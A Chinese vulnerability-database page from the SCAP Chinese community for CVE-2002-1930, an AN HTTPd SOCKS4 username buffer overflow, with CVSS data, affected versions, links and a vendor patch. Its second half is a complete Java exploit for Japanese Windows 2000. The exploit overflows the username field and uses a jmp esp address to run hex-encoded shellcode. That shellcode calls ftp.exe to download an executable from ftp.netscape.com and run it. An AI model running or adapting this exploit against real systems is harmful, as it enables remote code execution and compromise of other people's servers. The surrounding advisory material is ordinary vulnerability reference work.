CVE-2002-1930
CVSS7.5
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:53
NMCOE    

[原文]Buffer overflow in AN HTTPd 1.38 through 1.4.1c allows remote attackers to execute arbitrary code via a SOCKS4 request with a long username.


[CNNVD]AN HTTPD畸形SOCKS4请求远程缓冲区溢出漏洞(CNNVD-200212-109)

        
        AN HTTPD是一款日文多用户服务程序,可以以SOCKS4服务程序工作。
        AN HTTPD作为以SOCKS4服务程序工作时对用户提交的超长用户名SOCKS4请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以AN HTTPD进程权限在系统上执行任意指令。
        当AN HTTPD作为SOCKS4服务器时,对用户名处理不安全,攻击者可以在SOCKS4请求中附带超长的用户名,可导致AN HTTPD产生缓冲区溢出,精心构建提交数据可以以AN HTTPD进程在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:an:an-httpd:1.38
cpe:/a:an:an-httpd:1.41c
cpe:/a:an:an-httpd:1.41
cpe:/a:an:an-httpd:1.40
cpe:/a:an:an-httpd:1.39
cpe:/a:an:an-httpd:1.41b

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1930
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1930
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-109
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6012
(PATCH)  BID  6012
http://www.iss.net/security_center/static/10410.php
(PATCH)  XF  an-http-socks4-bo(10410)
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0032.html
(UNKNOWN)  VULNWATCH  20021021 AN HTTPD SOCKS4 username Buffer Overflow Vulnerability

- 漏洞信息

AN HTTPD畸形SOCKS4请求远程缓冲区溢出漏洞
高危 边界条件错误
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        AN HTTPD是一款日文多用户服务程序,可以以SOCKS4服务程序工作。
        AN HTTPD作为以SOCKS4服务程序工作时对用户提交的超长用户名SOCKS4请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以AN HTTPD进程权限在系统上执行任意指令。
        当AN HTTPD作为SOCKS4服务器时,对用户名处理不安全,攻击者可以在SOCKS4请求中附带超长的用户名,可导致AN HTTPD产生缓冲区溢出,精心构建提交数据可以以AN HTTPD进程在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        AN
        --
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        AN Upgrade httpd141d.zip
        
        http://www.st.rim.or.jp/~nakata/httpd141d.zip

- 漏洞信息 (21955)

AN HTTPD 1.38/1.39/1.40/1.41 Malformed SOCKS4 Request Buffer Overflow Vulnerability (EDBID:21955)
windows remote
2002-10-21 Verified
0 Kanatoko
N/A [点击下载]
source: http://www.securityfocus.com/bid/6012/info

A buffer overflow vulnerability has been reported for AN HTTPD. The vulnerability is due to insufficient bounds checking of usernames for SOCKS4 requests.

When AN HTTPD acts as a SOCKS4 server, it handles user names in an unsafe manner. An attacker can exploit this vulnerability by sending an overly long username as part of a SOCKS4 request. This may overflow a buffer used by AN HTTPD and cause the server to overwrite adjacent memory. Successful exploitation may, in turn, lead to the execution of arbitrary code as the AN HTTPD process.

/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko <anvil@jumperz.net>
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
{
private static final int SOCKS_PORT        = 1080;

private String targetHost;
//----------------------------------------------------------------------------
public static void main( String[] args )
throws Exception
{
if( args.length != 1 )
        {
        System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )" );
        return;
        }
anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
instance.doIt();
}
//----------------------------------------------------------------------------
public anhttpd141c_exploit( String IN_targetHost )
throws Exception
{
targetHost        = IN_targetHost;
}
//----------------------------------------------------------------------------
private void doIt()
throws Exception
{
Socket socket        = new Socket( targetHost, SOCKS_PORT );
OutputStream os        = socket.getOutputStream();

byte[] socks4_request = {
(byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01
};

        // egg: download and start installing Netscape4.79 :)
        // http://www.jumperz.net/egg_netscape.cpp
byte[] egg = {
(byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57, (byte)0x90, (byte)0x90,
(byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63, (byte)0x01, (byte)0x88,
(byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88, (byte)0x23, (byte)0x88,
(byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83, (byte)0xEB, (byte)0x68,
(byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9, (byte)0xC2, (byte)0x1B,
(byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83, (byte)0xC3, (byte)0x02,
(byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1,
(byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1,
(byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A, (byte)0x9B, (byte)0x01,
(byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21, (byte)0x53, (byte)0xB9,
(byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0xB8, (byte)0x94,
(byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8, (byte)0xA7, (byte)0xFF,
(byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58, (byte)0x62, (byte)0x69,
(byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67, (byte)0x65, (byte)0x74,
(byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F, (byte)0x63, (byte)0x6F,
(byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63, (byte)0x61, (byte)0x74,
(byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67, (byte)0x6C, (byte)0x69,
(byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37, (byte)0x39, (byte)0x2F,
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x2F,
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x39,
(byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E, (byte)0x74, (byte)0x2F,
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65, (byte)0x74, (byte)0x65,
(byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61, (byte)0x6C, (byte)0x6C,
(byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64, (byte)0x34, (byte)0x37,
(byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A, (byte)0x71, (byte)0x75,
(byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x65,
(byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A, (byte)0x71, (byte)0x20,
(byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x6E,
(byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70, (byte)0x65, (byte)0x2E,
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32,
(byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65,
(byte)0x58
};

byte[] jmp_esp = {
(byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
};

os.write( socks4_request );

        //where is memset? :0
for( int i = 0; i < 1020; ++i )
        {
        os.write( (byte)0x41 );
        }

os.write( jmp_esp );
os.write( egg );
os.write( (byte)0x00 );
}
//----------------------------------------------------------------------------
} 		

- 漏洞信息

59787
AN HTTP SOCKS4 username Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2002-10-21 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站